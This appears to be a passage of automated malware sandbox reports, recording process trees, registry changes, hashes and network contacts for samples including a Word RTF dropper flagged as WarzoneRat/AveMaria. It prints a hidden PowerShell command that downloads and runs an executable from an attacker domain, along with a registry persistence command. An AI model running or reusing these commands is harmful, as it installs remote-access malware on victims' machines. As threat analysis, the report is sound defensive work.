| SHA512 | 0d7cc1d3bd30c7c5d2b549c5dd9fe332b95b5947637e8b00fd0790ff4ee6bb222fa3267b60779782a3f1c18e28b1f004f321008fc018c986db36fe37dc44d351 |
C:\ProgramData\images.exe
| MD5 | 40cc8249b0f31d6e1c0065aab24007b1 |
| SHA1 | f73e02ad09976ade8985ec833c5743dc387c9687 |
| SHA256 | 662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a |
| SHA512 | 0d7cc1d3bd30c7c5d2b549c5dd9fe332b95b5947637e8b00fd0790ff4ee6bb222fa3267b60779782a3f1c18e28b1f004f321008fc018c986db36fe37dc44d351 |
memory/3532-140-0x0000000000000000-mapping.dmp
memory/3084-142-0x0000000004DF0000-0x00000000052EE000-memory.dmp
memory/1364-152-0x0000000000405E28-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 40cc8249b0f31d6e1c0065aab24007b1 |
| SHA1 | f73e02ad09976ade8985ec833c5743dc387c9687 |
| SHA256 | 662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a |
| SHA512 | 0d7cc1d3bd30c7c5d2b549c5dd9fe332b95b5947637e8b00fd0790ff4ee6bb222fa3267b60779782a3f1c18e28b1f004f321008fc018c986db36fe37dc44d351 |
C:\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 40cc8249b0f31d6e1c0065aab24007b1 |
| SHA1 | f73e02ad09976ade8985ec833c5743dc387c9687 |
| SHA256 | 662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a |
| SHA512 | 0d7cc1d3bd30c7c5d2b549c5dd9fe332b95b5947637e8b00fd0790ff4ee6bb222fa3267b60779782a3f1c18e28b1f004f321008fc018c986db36fe37dc44d351 |
memory/3084-155-0x0000000004DF0000-0x00000000052EE000-memory.dmp
memory/1364-156-0x0000000000400000-0x000000000055E000-memory.dmp
memory/3924-157-0x0000000000000000-mapping.dmp
memory/3924-158-0x0000000002680000-0x0000000002681000-memory.dmp
memory/1364-159-0x0000000004450000-0x000000000458C000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:35
Platform
win7v20210410
Max time kernel
10s
Max time network
25s
Command Line
Signatures
Guloader,Cloudeye
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a3feb5265e6d02710f04ff618e966e9da9ba8fc8dc5692d6f7633fe0a3037b66.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\a3feb5265e6d02710f04ff618e966e9da9ba8fc8dc5692d6f7633fe0a3037b66.exe
"C:\Users\Admin\AppData\Local\Temp\a3feb5265e6d02710f04ff618e966e9da9ba8fc8dc5692d6f7633fe0a3037b66.exe"
Network
Files
memory/2016-61-0x0000000000270000-0x0000000000283000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:31
Platform
ubuntu-amd64
Max time kernel
21858s
Max time network
60s
Command Line
Signatures
Processes
./0f56c5738ae435abeac7a0928a5de2ff5d4082370c43f257a4c0589212f08901
[./0f56c5738ae435abeac7a0928a5de2ff5d4082370c43f257a4c0589212f08901]
Network
| Country | Destination | Domain | Proto |
| N/A | 1.1.1.1:53 | ntp.ubuntu.com | udp |
| N/A | 1.1.1.1:53 | ntp.ubuntu.com | udp |
| N/A | 91.189.91.157:123 | ntp.ubuntu.com | udp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:31
Platform
debian9-mipsel
Max time kernel
0s
Max time network
10s
Command Line
Signatures
Processes
./0f56c5738ae435abeac7a0928a5de2ff5d4082370c43f257a4c0589212f08901
[./0f56c5738ae435abeac7a0928a5de2ff5d4082370c43f257a4c0589212f08901]
Network
| Country | Destination | Domain | Proto |
| N/A | 1.1.1.1:53 | 2.debian.pool.ntp.org | udp |
| N/A | 1.1.1.1:53 | 2.debian.pool.ntp.org | udp |
| N/A | 162.159.200.123:123 | 2.debian.pool.ntp.org | udp |
Files
Analysis: behavioral14
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win7v20210408
Max time kernel
149s
Max time network
194s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE |
WarzoneRat, AveMaria
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\microF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\microF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\microF.exe | N/A |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\cCBy.blyi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cCBy.blyi.exe | N/A |
Sets DLL path for service in the registry
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\microF.exe | N/A |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\cCBy.blyi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Reads user/profile data of web browsers
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | freegeoip.app | N/A | N/A |
| N/A | checkip.dyndns.org | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\xhdvvza = "0" | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\rfxvmt.dll | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1956 set thread context of 240 | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | C:\Users\Admin\AppData\Local\Temp\microF.exe |
| PID 1904 set thread context of 752 | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | C:\Users\Admin\AppData\Local\Temp\microF.exe |
| PID 364 set thread context of 1656 | N/A | C:\ProgramData\images.exe | C:\Users\Admin\AppData\Local\Temp\images.exe |
| PID 1604 set thread context of 1752 | N/A | C:\Users\Admin\AppData\Roaming\cCBy.blyi.exe | C:\Users\Admin\AppData\Local\Temp\cCBy.blyi.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Microsoft DN1\sqlmap.dll | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| File created | C:\Program Files\Microsoft DN1\rdpwrap.ini | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Enumerates physical storage devices
Office loads VBA resources, possible macro or embedded object present
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | N/A |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\cCBy.blyi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\cCBy.blyi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cCBy.blyi.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\images.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\cCBy.blyi.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\cCBy.blyi.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\52969fae09c2428c701a8b51a20c1eb07bab1bca79acb21eaa910d764533155d.rtf"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://hutyrtit.ydns.eu/microF.exe','C:\Users\Admin\AppData\Roaming\microF.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\microF.exe'"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://hutyrtit.ydns.eu/microF.exe','C:\Users\Admin\AppData\Roaming\microF.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\microF.exe'"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://hutyrtit.ydns.eu/microF.exe','C:\Users\Admin\AppData\Roaming\microF.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\microF.exe'"
C:\Users\Admin\AppData\Roaming\microF.exe
"C:\Users\Admin\AppData\Roaming\microF.exe"
C:\Users\Admin\AppData\Roaming\microF.exe
"C:\Users\Admin\AppData\Roaming\microF.exe"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Users\Admin\AppData\Local\Temp\microF.exe
C:\Users\Admin\AppData\Local\Temp\microF.exe
C:\Users\Admin\AppData\Local\Temp\microF.exe
C:\Users\Admin\AppData\Local\Temp\microF.exe
C:\Users\Admin\AppData\Local\Temp\microF.exe
C:\Users\Admin\AppData\Local\Temp\microF.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
C:\ProgramData\images.exe
"C:\ProgramData\images.exe"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Users\Admin\AppData\Roaming\cCBy.blyi.exe
"C:\Users\Admin\AppData\Roaming\cCBy.blyi.exe"
C:\Users\Admin\AppData\Local\Temp\cCBy.blyi.exe
C:\Users\Admin\AppData\Local\Temp\cCBy.blyi.exe
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | hutyrtit.ydns.eu | udp |
| N/A | 203.159.80.107:80 | hutyrtit.ydns.eu | tcp |
| N/A | 203.159.80.107:80 | hutyrtit.ydns.eu | tcp |
| N/A | 8.8.8.8:53 | sdafsdffssffs.ydns.eu | udp |
| N/A | 203.159.80.107:6703 | sdafsdffssffs.ydns.eu | tcp |
| N/A | 203.159.80.107:80 | sdafsdffssffs.ydns.eu | tcp |
| N/A | 8.8.8.8:53 | checkip.dyndns.org | udp |
| N/A | 132.226.8.169:80 | checkip.dyndns.org | tcp |
| N/A | 8.8.8.8:53 | freegeoip.app | udp |
| N/A | 172.67.188.154:443 | freegeoip.app | tcp |
Files
memory/1724-60-0x0000000072C71000-0x0000000072C74000-memory.dmp
memory/1724-61-0x00000000706F1000-0x00000000706F3000-memory.dmp
memory/1724-62-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/1724-63-0x00000000769B1000-0x00000000769B3000-memory.dmp
memory/976-64-0x0000000000000000-mapping.dmp
memory/976-66-0x0000000000910000-0x0000000000911000-memory.dmp
memory/976-67-0x0000000004850000-0x0000000004851000-memory.dmp
memory/976-68-0x0000000000830000-0x0000000000831000-memory.dmp
memory/976-69-0x0000000000832000-0x0000000000833000-memory.dmp
memory/976-70-0x0000000001050000-0x0000000001051000-memory.dmp
memory/976-71-0x0000000004790000-0x0000000004791000-memory.dmp
memory/1140-72-0x0000000000000000-mapping.dmp
memory/992-74-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | d5941f190fb2c6b016623502e60e1673 |
| SHA1 | d234176d1abbf2cdb5e42bdcab6e5b06c1299dff |
| SHA256 | 19b224db27068793f3dc049433d155a665b8153195cc050817b5bddca0386941 |
| SHA512 | 7bde15ea0b9c4a60cef478c7cc030a6daed10886825d216cc535eca4c4e5082982d00105c30cbcda5580413913ad254139fb8c0d6411baddb12be2ca7529947b |
memory/976-78-0x0000000005FE0000-0x0000000005FE1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | d5941f190fb2c6b016623502e60e1673 |
| SHA1 | d234176d1abbf2cdb5e42bdcab6e5b06c1299dff |
| SHA256 | 19b224db27068793f3dc049433d155a665b8153195cc050817b5bddca0386941 |
| SHA512 | 7bde15ea0b9c4a60cef478c7cc030a6daed10886825d216cc535eca4c4e5082982d00105c30cbcda5580413913ad254139fb8c0d6411baddb12be2ca7529947b |
memory/976-89-0x00000000060B0000-0x00000000060B1000-memory.dmp
memory/976-90-0x000000007EF30000-0x000000007EF31000-memory.dmp
memory/992-93-0x0000000004A12000-0x0000000004A13000-memory.dmp
memory/992-92-0x0000000004A10000-0x0000000004A11000-memory.dmp
memory/1140-91-0x00000000049A0000-0x00000000049A1000-memory.dmp
memory/976-95-0x00000000060E0000-0x00000000060E1000-memory.dmp
memory/976-102-0x0000000005FB0000-0x0000000005FB1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6ccb18ff-7a22-469e-90e7-ccc861e1432b
| MD5 | b6d38f250ccc9003dd70efd3b778117f |
| SHA1 | d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a |
| SHA256 | 4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265 |
| SHA512 | 67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | aabbfd45df18371a10ffdeec237f4ab6 |
| SHA1 | b79bc62b78a813ad38c77e39aafe42bcce12361f |
| SHA256 | 5458ef0fe3bceee8b6b84a7f2198915328766117ccf9937e88aa2e40f7c0cacb |
| SHA512 | c7699d7d230758f867a8017aede4498963838f2e7016903bd1ee13090c213036381330ef89f26406d9d33194ae79250538272916faa3930eb05a5ad58b2d71f1 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bd47eb21-a96b-4ccd-99d7-0d9f3f6c10b6
| MD5 | 75a8da7754349b38d64c87c938545b1b |
| SHA1 | 5c28c257d51f1c1587e29164cc03ea880c21b417 |
| SHA256 | bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96 |
| SHA512 | 798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643 |
memory/976-110-0x00000000062A0000-0x00000000062A1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1abda922-9e0e-4200-89d0-60796083afcc
| MD5 | be4d72095faf84233ac17b94744f7084 |
| SHA1 | cc78ce5b9c57573bd214a8f423ee622b00ebb1ec |
| SHA256 | b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc |
| SHA512 | 43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c9b427a0-6073-4eb8-9b09-f8e4712d7ab5
| MD5 | 5e3c7184a75d42dda1a83606a45001d8 |
| SHA1 | 94ca15637721d88f30eb4b6220b805c5be0360ed |
| SHA256 | 8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59 |
| SHA512 | fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_10a2719f-ab19-452c-9537-375fecbe5f96
| MD5 | df44874327d79bd75e4264cb8dc01811 |
| SHA1 | 1396b06debed65ea93c24998d244edebd3c0209d |
| SHA256 | 55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181 |
| SHA512 | 95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_60554f64-a36e-4439-8748-76f202d7cb75
| MD5 | 02ff38ac870de39782aeee04d7b48231 |
| SHA1 | 0390d39fa216c9b0ecdb38238304e518fb2b5095 |
| SHA256 | fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876 |
| SHA512 | 24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_32b21970-4839-4ac5-a2ad-cc925aecc47c
| MD5 | a725bb9fafcf91f3c6b7861a2bde6db2 |
| SHA1 | 8bb5b83f3cc37ff1e5ea4f02acae38e72364c114 |
| SHA256 | 51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431 |
| SHA512 | 1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7bc5ca8a-50eb-4a28-856a-31595e01418a
| MD5 | 597009ea0430a463753e0f5b1d1a249e |
| SHA1 | 4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62 |
| SHA256 | 3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d |
| SHA512 | 5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | 124a46201ef78cfbf1b6ca42b9258e98 |
| SHA1 | d926ff2529378e404d1be111c055950c47d7313a |
| SHA256 | 862a5e44d2ca4d4f785b7a97f42ef3e44fbd9a9ed44c7edce86139b2135bfc3f |
| SHA512 | 91af241ef8ea7ebce9d55a20d6147a4773d335996ad966bb7c951bb7cd8f0729d1c133205c9031f47699976b976121b2cb4b3f01393d54cd41a44b352b119272 |
\Users\Admin\AppData\Roaming\microF.exe
| MD5 | 100c3e2649fd32ce6d7e108e1a2ebf0d |
| SHA1 | 7f6c8fab6fa84ad9f12d4cf08cb684d525073230 |
| SHA256 | 29a4c97029dcf52e73bb65d748d1fd6194c5f7f72fe8c272320bbe38636e0f3a |
| SHA512 | 96570f3a334448cce354a784c3f9d43594a21329d2784dc459b6cc27aaba6b5132fa2d0a4b889cbdaa75394cf1c6c1bebcd5ee694f7f0528a398665c611bf936 |
memory/1956-116-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\microF.exe
| MD5 | 100c3e2649fd32ce6d7e108e1a2ebf0d |
| SHA1 | 7f6c8fab6fa84ad9f12d4cf08cb684d525073230 |
| SHA256 | 29a4c97029dcf52e73bb65d748d1fd6194c5f7f72fe8c272320bbe38636e0f3a |
| SHA512 | 96570f3a334448cce354a784c3f9d43594a21329d2784dc459b6cc27aaba6b5132fa2d0a4b889cbdaa75394cf1c6c1bebcd5ee694f7f0528a398665c611bf936 |
C:\Users\Admin\AppData\Roaming\microF.exe
| MD5 | 100c3e2649fd32ce6d7e108e1a2ebf0d |
| SHA1 | 7f6c8fab6fa84ad9f12d4cf08cb684d525073230 |
| SHA256 | 29a4c97029dcf52e73bb65d748d1fd6194c5f7f72fe8c272320bbe38636e0f3a |
| SHA512 | 96570f3a334448cce354a784c3f9d43594a21329d2784dc459b6cc27aaba6b5132fa2d0a4b889cbdaa75394cf1c6c1bebcd5ee694f7f0528a398665c611bf936 |
memory/1956-119-0x0000000000C20000-0x0000000000C21000-memory.dmp
memory/1956-121-0x0000000004830000-0x0000000004831000-memory.dmp
C:\Users\Admin\AppData\Roaming\microF.exe
| MD5 | 100c3e2649fd32ce6d7e108e1a2ebf0d |
| SHA1 | 7f6c8fab6fa84ad9f12d4cf08cb684d525073230 |
| SHA256 | 29a4c97029dcf52e73bb65d748d1fd6194c5f7f72fe8c272320bbe38636e0f3a |
| SHA512 | 96570f3a334448cce354a784c3f9d43594a21329d2784dc459b6cc27aaba6b5132fa2d0a4b889cbdaa75394cf1c6c1bebcd5ee694f7f0528a398665c611bf936 |
memory/1904-123-0x0000000000000000-mapping.dmp
memory/992-122-0x0000000005970000-0x0000000005971000-memory.dmp
memory/1904-127-0x0000000004C10000-0x0000000004C11000-memory.dmp
memory/820-128-0x0000000000000000-mapping.dmp
